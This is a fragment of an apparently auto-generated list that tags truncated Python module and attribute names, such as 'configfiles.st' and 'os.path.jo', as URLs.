'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'html.es'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'log.init.in'], ['URL', 'os.path.jo'], ['URL', 'standarddir.ca'], ['URL', 'os.pa'], ['URL', 'configfiles.st'], ['URL', 'qtutils.ve'], ['URL', 'configfiles.st'], ['URL', 'configfiles.st'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'log.init.in'], ['URL', 'os.pa'], ['URL', 'shutil.mo'], ['URL', 'usertypes.Ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'objects.ba'], ['URL', 'usertypes.Ba'], ['URL', 'usertypes.Ba'], ['URL', 'argparse.Na'], ['URL', 'savemanager.Sa'], ['URL', 'args.no'], ['URL', 'checker.ch']]"